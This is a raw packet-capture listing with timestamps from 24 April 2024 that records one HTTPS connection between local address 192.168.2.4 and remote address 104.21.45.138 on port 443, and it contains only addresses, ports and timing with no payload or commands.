Apr 24, 2024 06:54:14.764107943 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.766083956 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.766099930 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.766161919 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.766168118 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.766201019 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.767898083 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.767913103 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.767970085 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.767973900 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.768007040 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.769776106 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.769855022 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.769859076 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.769918919 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.770390034 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.770428896 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.772162914 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.772186041 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.772236109 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.772241116 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.772269964 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.772289038 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.774167061 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.774229050 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.774238110 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.774333000 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.776994944 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.777010918 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.777124882 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.777132988 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.779043913 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.779064894 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.779099941 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.779107094 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.779130936 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.780896902 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.780911922 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.780951977 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.780961037 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.780987978 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.782315969 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.782335043 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.782377005 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.782386065 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.782422066 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.784089088 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.784112930 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.784156084 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.784162998 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.784200907 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.785657883 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.785677910 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.785729885 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.785734892 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.785767078 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.787635088 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.787650108 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.787681103 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.787688971 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.787715912 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.790251017 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.790271044 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.790309906 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.790318012 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.790354013 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.791264057 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.791276932 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.791367054 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.791372061 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.792836905 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.792859077 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.792922974 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.792938948 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.794708014 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.794724941 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.794780016 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.794787884 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.794816017 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.796709061 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.796729088 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.796777010 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.796785116 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.796823025 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.798388004 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.798403025 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.798480988 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.798486948 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.800086021 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.800113916 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.800143957 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.800152063 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.800184965 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.801632881 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.801649094 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.801696062 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.801702976 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.801734924 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.803832054 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.803852081 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.803920984 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.803926945 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.803952932 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.805217981 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.805242062 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.805288076 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.805291891 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.805319071 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.806878090 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.806896925 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.806938887 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.806945086 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.806977034 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.808449984 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.808465004 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.808511972 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.808517933 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.808551073 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.810312986 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.810333014 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.810394049 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.810399055 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.810452938 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.811829090 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.811842918 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.811896086 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.811899900 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.811920881 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.813628912 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.813647032 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.813702106 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.813709974 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.814780951 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.814795971 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.814852953 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.814860106 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.816499949 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.816519022 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.816585064 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.816591024 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.816617012 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.818417072 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.818439007 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.818465948 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.818471909 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.818542004 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.820036888 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.820058107 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.820094109 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.820108891 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.820131063 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.821405888 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.821419001 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.821485996 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.821491957 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.822963953 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.822983027 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.823024988 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.823029995 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.823055029 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.824810028 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.824836969 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.824872017 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.824878931 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.824903011 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.826287985 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.826308012 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.826360941 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.826365948 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.826400042 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.827649117 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.827663898 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.827718973 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.827723980 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.827749968 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.829406023 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.829426050 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.829463005 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.829468966 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.829504967 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.831042051 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.831057072 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.831115007 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.831121922 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.832619905 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.832639933 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.832704067 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.832710028 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.834089041 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.834103107 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.834150076 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.834156036 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.834186077 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.835577965 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.835598946 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.835637093 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.835644007 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.835675955 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.837013006 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.837025881 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.837069988 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.837075949 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.837099075 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.838279963 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.838299036 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.838371992 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.838376999 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.839776993 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.839790106 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.839840889 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.839847088 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.839874029 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.841502905 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.841522932 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.841559887 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.841566086 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.841602087 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.843271017 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.843285084 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.843327045 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.843333006 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.843362093 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.844373941 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.844393015 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.844436884 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.844441891 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.844451904 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.846051931 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.846066952 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.846117973 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.846123934 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.847409964 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.847431898 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.847470999 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.847476959 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.847487926 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.848985910 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.849001884 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.849050045 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.849055052 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.849071026 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.850442886 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.850464106 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.850506067 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.850511074 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.850522041 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.851936102 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.851953030 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.851998091 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.852004051 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.852015972 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.853508949 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.853528976 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.853564978 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.853569984 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.853594065 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.855047941 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.855062962 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.855104923 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.855109930 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.855132103 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.856657982 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.856678009 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.856712103 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.856715918 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.856741905 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.857939005 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.857954025 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.858009100 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.858014107 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.859208107 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.859226942 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.859273911 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.859278917 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.859297991 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.860743999 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.860757113 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.860797882 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.860802889 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.862418890 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.862437963 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.862469912 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.862473965 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.862497091 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.863547087 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.863559961 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.863595963 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.863600016 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.863622904 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.864931107 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.864950895 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.864981890 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.864985943 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.865009069 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.866542101 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.866555929 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.866600037 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.866604090 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.866621017 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.868657112 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.868675947 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.868714094 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.868719101 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.868735075 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.870999098 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.871011972 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.871190071 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.871196985 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.872137070 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.872165918 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.872210979 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.872215986 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.872224092 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.873451948 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.873466015 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.873512983 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.873517990 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.873533964 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.874382973 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.874402046 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.874440908 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.874444962 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.874460936 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.875176907 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.875190973 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.875240088 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.875247002 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.875257015 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.876272917 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.876292944 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.876331091 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.876334906 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.876357079 CEST	49732	443	192.168.2.4	104.21.45.138
